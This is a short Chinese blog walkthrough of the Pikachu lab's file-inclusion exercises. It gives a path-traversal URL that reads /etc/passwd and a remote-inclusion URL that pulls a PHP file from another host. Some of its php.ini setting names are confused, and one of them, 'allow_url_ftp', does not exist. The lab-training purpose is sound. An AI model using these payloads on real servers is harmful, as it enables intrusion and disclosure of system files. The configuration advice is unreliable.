pikachu-文件包含

1.File Inclusion(local)

​ 正常情况下访问

http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?filename=file1.php&submit=提交

在这里插入图片描述

​ 尝试访问/etc/passwd (/etc/php.ini 需设Allow_url_include On)

http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_local.php?filename=../../../../../etc/passwd&submit=提交

在这里插入图片描述

2.File Inclusion(remote)

​ 正常情况下访问

在这里插入图片描述

# FileInclude.php
<?php phpinfo(); ?>

尝试访问http://192.168.1.1/FileInclude.php(192.168.1.150 /etc/php.ini 需设allow_url_ftp on)

http://192.168.1.150/pikachu-labs/vul/fileinclude/fi_remote.php?filename=http://192.168.1.1/FileInclude.php&submit=提交查询

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值